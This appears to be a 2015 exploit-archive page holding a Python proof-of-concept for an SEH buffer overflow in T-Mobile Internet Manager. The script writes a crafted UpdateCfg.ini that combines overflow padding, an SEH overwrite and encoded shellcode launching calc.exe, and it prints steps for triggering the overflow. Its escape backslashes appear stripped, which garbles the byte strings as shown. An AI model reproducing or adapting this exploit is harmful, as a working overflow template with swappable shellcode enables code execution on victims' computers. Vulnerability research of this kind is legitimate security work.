Home / exploits T-Mobile Internet Manager SEH Buffer Overflow
Posted on 14 January 2015
#!/usr/bin/python # coding: utf-8 #Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow #Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06) #Software for usb Wireless:T-Mobile web'n'walk Stick Fusion #Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html #Software Link:https://www.t-mobile.de/downloads/neu/winui.zip #Found:8.01.2015 #Exploit Author: metacom - twitter.com/m3tac0m #Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN #Video poc:http://bit.ly/17DhwSR print "[*]Copy UpdateCfg.ini to C:Program FilesT-MobileInternetManager_ZBin " print "[*]Open Program and go to Menu-Options " print "[*]Click Update and press Now look for Update " from struct import pack junk="x41" * 18073 nseh="xebx06x90x90" seh=pack('<I',0x6900CEAE)#6900CEAE 5F POP EDI intl.dll nops="x90" * 100 #msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | #msfencode -e x86/alpha_upper -b "x00x0ax0dx1axff" -t c shellcode=("x89xe2xddxc1xd9x72xf4x5ex56x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx5ax48x4dx59x55x50" "x35x50x35x50x53x50x4dx59x4bx55x46x51x59x42x33" "x54x4cx4bx56x32x30x30x4cx4bx31x42x44x4cx4cx4b" "x30x52x45x44x4cx4bx44x32x57x58x34x4fx38x37x50" "x4ax51x36x46x51x4bx4fx30x31x49x50x4ex4cx47x4c" "x33x51x43x4cx34x42x36x4cx31x30x49x51x48x4fx54" "x4dx45x51x59x57x4dx32x4cx30x56x32x46x37x4cx4b" "x31x42x44x50x4cx4bx31x52x57x4cx43x31x48x50x4c" "x4bx51x50x53x48x4bx35x49x50x34x34x51x5ax53x31" "x4ex30x36x30x4cx4bx50x48x52x38x4cx4bx36x38x47" "x50x45x51x58x53x4bx53x57x4cx37x39x4cx4bx36x54" "x4cx4bx33x31x39x46x30x31x4bx4fx56x51x49x50x4e" "x4cx4fx31x58x4fx44x4dx55x51x49x57x37x48x4dx30" "x52x55x4bx44x43x33x43x4dx4ax58x37x4bx33x4dx57" "x54x33x45x4bx52x30x58x4cx4bx36x38x57x54x33x31" "x58x53x55x36x4cx4bx54x4cx30x4bx4cx4bx56x38x45" "x4cx35x51x58x53x4cx4bx55x54x4cx4bx33x31x38x50" "x4bx39x57x34x31x34x46x44x51x4bx31x4bx53x51x30" "x59x50x5ax46x31x4bx4fx4dx30x51x48x31x4fx30x5a" "x4cx4bx34x52x5ax4bx4cx46x31x4dx33x5ax43x31x4c" "x4dx4cx45x38x39x55x50x45x50x43x30x50x50x53x58" "x56x51x4cx4bx32x4fx4cx47x4bx4fx38x55x4fx4bx4b" "x4ex44x4ex30x32x4ax4ax32x48x39x36x4cx55x4fx4d" "x4dx4dx4bx4fx4ex35x47x4cx33x36x43x4cx35x5ax4d" "x50x4bx4bx4bx50x54x35x33x35x4fx4bx47x37x52x33" "x54x32x32x4fx42x4ax43x30x46x33x4bx4fx49x45x52" "x43x53x51x42x4cx53x53x46x4ex43x55x43x48x35x35" "x43x30x41x41") header = "x5bx55x50x44x41x54x45x5dx0ax0ax0ax0ax45x4ex41x42x4cx45x5fx55x50x44x41x54x45x3dx31x0ax0ax0a" header += "x0ax55x50x44x41x54x45x5fx46x52x45x51x55x45x4ex43x45x3dx31x34x0ax0ax0ax0ax5bx53x65x72x76x69" header += "x63x65x5dx0ax0ax0ax0ax6dx65x74x61x63x6fx6dx3dx74x77x69x74x74x65x72x2ex63x6fx6dx2fx6dx33x74" header += "x61x63x30x6dx0ax0ax0ax0ax53x65x72x76x69x63x65x55x52x4cx3dx68x74x74x70x73x3ax2fx2fx74x6dx6f" header += "x62x69x6cx65x2ex7ax74x65x2ex63x6fx6dx2ex63x6ex2fx55x70x64x61x74x65x45x6ex74x72x79x2ex61x73" header += "x70x78x0ax0ax0ax0ax55x70x64x61x74x65x52x65x70x6fx72x74x3dx68x74x74x70x73x3ax2fx2fx74x6dx6f" header += "x62x69x6cx65x2ex7ax74x65x2ex63x6fx6dx2ex63x6ex2fx55x70x64x61x74x65x52x65x73x75x6cx74x52x65" header += "x70x6fx72x74x2ex61x73x70x78"+junk+nseh+seh+nops+shellcode+' ' footer = "x0ax53x65x72x76x69x63x65x50x6fx72x74x3dx34x34x33x0ax0ax0ax0ax55x50x44x41x54x45x5fx50x41x54x48" footer += "x3dx2ex2fx64x6fx77x6ex6cx6fx61x64x0ax0ax0ax0ax52x45x54x52x59x5fx43x4fx4ex4ex45x43x54x3dx33" footer += "x30x30x0ax0ax0ax0ax52x45x54x52x59x5fx53x4cx45x45x50x3dx31x0ax0ax0ax0ax43x4fx4ex4ex45x43x54" footer += "x5fx54x49x4dx45x4fx55x54x3dx32x30x0ax0ax0ax0ax5bx55x70x64x61x74x65x4dx6fx64x65x5dx0ax0ax0a" footer += "x0ax4dx6fx64x65x53x65x6cx65x63x74x53x79x73x3dx31x0a" exploit = header + footer filename = "UpdateCfg.ini" file = open(filename , "w") file.write(exploit) file.close()
